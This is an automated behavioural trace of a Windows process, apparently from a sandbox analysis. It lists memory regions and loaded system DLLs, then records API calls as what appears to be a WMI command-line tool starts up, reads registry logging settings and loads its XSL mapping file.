Region:
id = 4938
start_va = 0x29a0000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 4939
start_va = 0x2b90000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b90000"
filename = ""
Region:
id = 4940
start_va = 0x29a0000
end_va = 0x2a7efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000029a0000"
filename = ""
Region:
id = 4941
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 4942
start_va = 0x23b0000
end_va = 0x242ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 4943
start_va = 0x2440000
end_va = 0x24bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002440000"
filename = ""
Region:
id = 4944
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 4945
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 4946
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4947
start_va = 0x1fd0000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fd0000"
filename = ""
Region:
id = 4948
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4949
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4950
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4951
start_va = 0x1f30000
end_va = 0x1f74fff
monitored = 0
entry_point = 0x1f31064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4952
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 4953
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4954
start_va = 0x2d20000
end_va = 0x2d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 4955
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 4956
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 4957
start_va = 0x2e40000
end_va = 0x2ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e40000"
filename = ""
Region:
id = 4958
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4959
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 4960
start_va = 0x7fef7280000
end_va = 0x7fef7292fff
monitored = 0
entry_point = 0x7fef7287b68
region_type = mapped_file
name = "msoxmlmf.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")
Region:
id = 4961
start_va = 0x7fef9ac0000
end_va = 0x7fef9ad8fff
monitored = 0
entry_point = 0x7fef9acee50
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")
Region:
id = 4962
start_va = 0x7fef9ab0000
end_va = 0x7fef9ab3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 4963
start_va = 0x7fef99b0000
end_va = 0x7fef9aa1fff
monitored = 0
entry_point = 0x7fef99b9060
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 4964
start_va = 0x7fef99a0000
end_va = 0x7fef99a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 4965
start_va = 0x7fef9990000
end_va = 0x7fef9992fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 4966
start_va = 0x7fef9980000
end_va = 0x7fef9982fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 4967
start_va = 0x7fefb590000
end_va = 0x7fefb592fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 4968
start_va = 0x7fef9970000
end_va = 0x7fef9972fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 4969
start_va = 0x7fef9960000
end_va = 0x7fef9962fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 4970
start_va = 0x7fef9950000
end_va = 0x7fef9952fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 4971
start_va = 0x7fef9940000
end_va = 0x7fef9943fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 4972
start_va = 0x7fef9930000
end_va = 0x7fef9933fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 4973
start_va = 0x7fef9920000
end_va = 0x7fef9923fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 4974
start_va = 0x1bd0000
end_va = 0x1bd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 4975
start_va = 0x1f30000
end_va = 0x1f30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 4976
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4977
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4978
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4979
start_va = 0x1f40000
end_va = 0x1f63fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f40000"
filename = ""
Region:
id = 4980
start_va = 0x2c10000
end_va = 0x2d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c10000"
filename = ""
Region:
id = 5200
start_va = 0x7fef5950000
end_va = 0x7fef5966fff
monitored = 0
entry_point = 0x7fef595eba0
region_type = mapped_file
name = "wmi2xml.dll"
filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll")
Region:
id = 5201
start_va = 0x2ec0000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 5202
start_va = 0x7fef58b0000
end_va = 0x7fef5949fff
monitored = 1
entry_point = 0x7fef58be1b8
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 5203
start_va = 0x1f40000
end_va = 0x1f5afff
monitored = 0
entry_point = 0x1f76b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 5204
start_va = 0x7fefda80000
end_va = 0x7fefdb10fff
monitored = 0
entry_point = 0x7fefda81440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 5205
start_va = 0x1f60000
end_va = 0x1f63fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 5206
start_va = 0x2fc0000
end_va = 0x35ccfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Thread:
id = 242
os_tid = 0x440
[0562.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafa10 | out: lpSystemTimeAsFileTime=0xafa10*(dwLowDateTime=0x693e7e90, dwHighDateTime=0x1dab599))
[0562.092] GetCurrentProcessId () returned 0x520
[0562.092] GetCurrentThreadId () returned 0x440
[0562.092] GetTickCount () returned 0x24dfa
[0562.092] QueryPerformanceCounter (in: lpPerformanceCount=0xafa18 | out: lpPerformanceCount=0xafa18*=2095513829159) returned 1
[0562.093] GetModuleHandleW (lpModuleName=0x0) returned 0xffa60000
[0562.093] __set_app_type (_Type=0x1)
[0562.093] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffaaced0) returned 0x0
[0562.093] __wgetmainargs (in: _Argc=0xffad2380, _Argv=0xffad2390, _Env=0xffad2388, _DoWildCard=0, _StartInfo=0xffad239c | out: _Argc=0xffad2380, _Argv=0xffad2390, _Env=0xffad2388) returned 0
[0562.095] ??0CHString@@QEAA@XZ () returned 0xffad2ab0
[0562.097] malloc (_Size=0x30) returned 0x185b20
[0562.098] malloc (_Size=0x70) returned 0x187bc0
[0562.098] malloc (_Size=0x50) returned 0x187c40
[0562.098] malloc (_Size=0x30) returned 0x187ca0
[0562.098] malloc (_Size=0x48) returned 0x187ce0
[0562.098] malloc (_Size=0x30) returned 0x187d30
[0562.098] malloc (_Size=0x30) returned 0x187d70
[0562.098] ??0CHString@@QEAA@XZ () returned 0xffad2f58
[0562.098] malloc (_Size=0x30) returned 0x187db0
[0562.098] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0562.098] SetConsoleCtrlHandler (HandlerRoutine=0xffaa5724, Add=1) returned 1
[0562.099] _onexit (_Func=0xffabf378) returned 0xffabf378
[0562.099] _onexit (_Func=0xffabf490) returned 0xffabf490
[0562.099] _onexit (_Func=0xffabf4d0) returned 0xffabf4d0
[0562.099] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0562.099] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0562.109] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0562.132] CoCreateInstance (in: rclsid=0xffa673a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa67370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffad2940 | out: ppv=0xffad2940*=0x29cc20) returned 0x0
[0562.154] GetCurrentProcess () returned 0xffffffffffffffff
[0562.154] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf7e0 | out: TokenHandle=0xaf7e0*=0x108) returned 1
[0562.154] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf7d8 | out: TokenInformation=0x0, ReturnLength=0xaf7d8) returned 0
[0562.154] malloc (_Size=0x40) returned 0x187f00
[0562.154] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x187f00, TokenInformationLength=0x40, ReturnLength=0xaf7d8 | out: TokenInformation=0x187f00, ReturnLength=0xaf7d8) returned 1
[0562.154] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x187f00*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=943592138, Attributes=0x2b29))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0562.155] free (_Block=0x187f00)
[0562.155] CloseHandle (hObject=0x108) returned 1
[0562.157] malloc (_Size=0x40) returned 0x187f00
[0562.157] malloc (_Size=0x40) returned 0x187f50
[0562.157] malloc (_Size=0x40) returned 0x1865e0
[0562.157] malloc (_Size=0x20a) returned 0x186630
[0562.157] GetSystemDirectoryW (in: lpBuffer=0x186630, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0562.158] free (_Block=0x186630)
[0562.158] malloc (_Size=0x18) returned 0x187fa0
[0562.158] malloc (_Size=0x18) returned 0x37dfa0
[0562.158] malloc (_Size=0x18) returned 0x186630
[0562.158] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0562.158] SysStringLen (param_1="\\kernel32.dll") returned 0xd
[0562.158] memcpy (in: _Dst=0x2a42a8, _Src=0x2a1458, _Size=0x28 | out: _Dst=0x2a42a8) returned 0x2a42a8
[0562.158] memcpy (in: _Dst=0x2a42ce, _Src=0x2a1498, _Size=0x1c | out: _Dst=0x2a42ce) returned 0x2a42ce
[0562.159] free (_Block=0x187fa0)
[0562.159] free (_Block=0x37dfa0)
[0562.159] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77b10000
[0562.159] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadUILanguage") returned 0x77b261e0
[0562.159] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0562.159] FreeLibrary (hLibModule=0x77b10000) returned 1
[0562.159] free (_Block=0x186630)
[0562.159] _vsnwprintf (in: _Buffer=0x1865e0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xaf408 | out: _Buffer="ms_409") returned 6
[0562.160] malloc (_Size=0x20) returned 0x37dfa0
[0562.160] GetComputerNameW (in: lpBuffer=0x37dfa0, nSize=0xaf7e0 | out: lpBuffer="Q9IATRKPRH", nSize=0xaf7e0) returned 1
[0562.160] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.160] malloc (_Size=0x16) returned 0x187fa0
[0562.160] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.160] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xaf7d8 | out: lpNameBuffer=0x0, nSize=0xaf7d8) returned 0x7fffffde000
[0562.163] GetLastError () returned 0xea
[0562.163] malloc (_Size=0x2c) returned 0x186630
[0562.163] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x186630, nSize=0xaf7d8 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0xaf7d8) returned 0x1
[0562.164] lstrlenW (lpString="") returned 0
[0562.164] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.164] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0562.167] lstrlenW (lpString=".") returned 1
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2=".", cchCount2=1) returned 3
[0562.167] lstrlenW (lpString="LOCALHOST") returned 9
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="LOCALHOST", cchCount2=9) returned 3
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.167] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="Q9IATRKPRH", cchCount2=10) returned 2
[0562.168] free (_Block=0x187fa0)
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x16) returned 0x187fa0
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x16) returned 0x186670
[0562.168] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0562.168] malloc (_Size=0x8) returned 0x186690
[0562.168] malloc (_Size=0x18) returned 0x1866b0
[0562.168] malloc (_Size=0x30) returned 0x1866d0
[0562.168] malloc (_Size=0x18) returned 0x186710
[0562.168] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.168] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.168] malloc (_Size=0x30) returned 0x186730
[0562.168] malloc (_Size=0x18) returned 0x186770
[0562.168] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.168] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="IMPERSONATE") returned 0xb
[0562.169] malloc (_Size=0x30) returned 0x186790
[0562.169] malloc (_Size=0x18) returned 0x1867d0
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] SysStringLen (param_1="IDENTIFY") returned 0x8
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="ANONYMOUS") returned 0x9
[0562.169] SysStringLen (param_1="DELEGATE") returned 0x8
[0562.169] malloc (_Size=0x30) returned 0x1867f0
[0562.169] malloc (_Size=0x18) returned 0x186830
[0562.169] malloc (_Size=0x30) returned 0x186850
[0562.169] malloc (_Size=0x18) returned 0x186890
[0562.169] SysStringLen (param_1="NONE") returned 0x4
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.169] SysStringLen (param_1="NONE") returned 0x4
[0562.169] malloc (_Size=0x30) returned 0x1868b0
[0562.169] malloc (_Size=0x18) returned 0x1868f0
[0562.169] SysStringLen (param_1="CONNECT") returned 0x7
[0562.169] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] malloc (_Size=0x30) returned 0x186910
[0562.170] malloc (_Size=0x18) returned 0x186950
[0562.170] SysStringLen (param_1="CALL") returned 0x4
[0562.170] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] SysStringLen (param_1="CALL") returned 0x4
[0562.170] SysStringLen (param_1="CONNECT") returned 0x7
[0562.170] malloc (_Size=0x30) returned 0x186970
[0562.170] malloc (_Size=0x18) returned 0x1869b0
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] SysStringLen (param_1="NONE") returned 0x4
[0562.170] SysStringLen (param_1="NONE") returned 0x4
[0562.170] SysStringLen (param_1="PKT") returned 0x3
[0562.170] malloc (_Size=0x30) returned 0x188000
[0562.170] malloc (_Size=0x18) returned 0x186dd0
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="NONE") returned 0x4
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] malloc (_Size=0x30) returned 0x188040
[0562.171] malloc (_Size=0x18) returned 0x186df0
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="DEFAULT") returned 0x7
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="PKT") returned 0x3
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
[0562.171] SysStringLen (param_1="PKTPRIVACY") returned 0xa
[0562.172] malloc (_Size=0x30) returned 0x188080
[0562.172] malloc (_Size=0x40) returned 0x186e10
[0562.172] malloc (_Size=0x20a) returned 0x188fd0
[0562.172] GetSystemDirectoryW (in: lpBuffer=0x188fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0562.173] free (_Block=0x188fd0)
[0562.173] malloc (_Size=0x18) returned 0x186e60
[0562.173] malloc (_Size=0x18) returned 0x189000
[0562.173] malloc (_Size=0x18) returned 0x189020
[0562.173] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
[0562.173] SysStringLen (param_1="\\wbem\\") returned 0x6
[0562.173] memcpy (in: _Dst=0x2866c8, _Src=0x2a1498, _Size=0x28 | out: _Dst=0x2866c8) returned 0x2866c8
[0562.173] memcpy (in: _Dst=0x2866ee, _Src=0x2a0ac8, _Size=0xe | out: _Dst=0x2866ee) returned 0x2866ee
[0562.173] free (_Block=0x186e60)
[0562.173] free (_Block=0x189000)
[0562.173] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
[0562.174] free (_Block=0x189020)
[0562.174] malloc (_Size=0x18) returned 0x189020
[0562.174] malloc (_Size=0x18) returned 0x189000
[0562.174] malloc (_Size=0x18) returned 0x189040
[0562.174] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
[0562.174] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
[0562.174] memcpy (in: _Dst=0x2a4928, _Src=0x286718, _Size=0x34 | out: _Dst=0x2a4928) returned 0x2a4928
[0562.174] memcpy (in: _Dst=0x2a495a, _Src=0x2a1498, _Size=0x22 | out: _Dst=0x2a495a) returned 0x2a495a
[0562.174] free (_Block=0x189020)
[0562.174] free (_Block=0x189000)
[0562.174] GetCurrentThreadId () returned 0x440
[0562.174] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xaf0e0 | out: phkResult=0xaf0e0*=0x10c) returned 0x0
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xaf130, lpcbData=0xaf0d0*=0x400 | out: lpType=0x0, lpData=0xaf130*=0x30, lpcbData=0xaf0d0*=0x4) returned 0x0
[0562.175] _wcsicmp (_String1="0", _String2="1") returned -1
[0562.175] _wcsicmp (_String1="0", _String2="2") returned -2
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xaf0d0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xaf0d0*=0x42) returned 0x0
[0562.175] malloc (_Size=0x86) returned 0x186e60
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x186e60, lpcbData=0xaf0d0*=0x42 | out: lpType=0x0, lpData=0x186e60*=0x25, lpcbData=0xaf0d0*=0x42) returned 0x0
[0562.175] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0562.175] malloc (_Size=0x42) returned 0x186ef0
[0562.175] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0562.175] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xaf130, lpcbData=0xaf0d0*=0x400 | out: lpType=0x0, lpData=0xaf130*=0x36, lpcbData=0xaf0d0*=0xc) returned 0x0
[0562.175] _wtol (_String="65536") returned 65536
[0562.176] free (_Block=0x186e60)
[0562.176] RegCloseKey (hKey=0x0) returned 0x6
[0562.176] CoCreateInstance (in: rclsid=0xffa67410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffa673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xaf5d8 | out: ppv=0xaf5d8*=0x1fd71d0) returned 0x0
[0562.494] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1fd71d0, xmlSource=0xaf720*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x186e60), isSuccessful=0xaf790 | out: isSuccessful=0xaf790*=0xffff) returned 0x0
